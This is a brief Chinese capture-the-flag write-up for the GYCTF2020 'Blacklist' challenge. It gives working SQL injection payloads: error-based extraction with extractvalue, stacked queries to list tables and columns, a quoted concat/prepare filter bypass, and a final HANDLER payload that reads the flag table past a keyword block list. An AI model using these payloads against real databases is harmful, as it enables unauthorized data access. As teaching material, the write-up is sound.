[GYCTF2020]Blacklist
先打开url 题目名字黑名单:尝试正常注入流程发现有过滤提示
set|prepare|alter|rename|select|update|delete|drop|insert|where
看到界面和过滤信息感觉很像2019年强网杯一道题好像是叫随便注;
我做题时先用报错注入爆除了库名supersqli
1'or(extractvalue(1,concat(0x7e,database())))#
后来尝试堆叠注入做题:
-1';use supersqli;show tables #
爆出表名:FlagHere,words
1'; show columns from FlagHere;#
爆出列名:flag,varchar(100),NO
做到这里就不会做了,强网杯那道题用字符串拼接payload是:
-1';use information_schema;set @sql=concat('s','elect', 'column_name from columns wher','e table_name="1919810931114514"')PREPARE stmt1 FROM @sql;EXECUTE stmt1;#
但是这题过滤了set,prepare
过滤更狠,查了一下发现个东西:
通过HANDLER tbl_name OPEN打开一张表,无返回结果,
实际上我们在这里声明了一个名为tb1_name的句柄。
通过HANDLER tbl_name READ FIRST获取句柄的第一行,
通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
通过HANDLER tbl_name CLOSE来关闭打开的句柄。
最后构建payload:
1';handler FlagHere open;handler FlagHere read first;Handler FlagHere close;#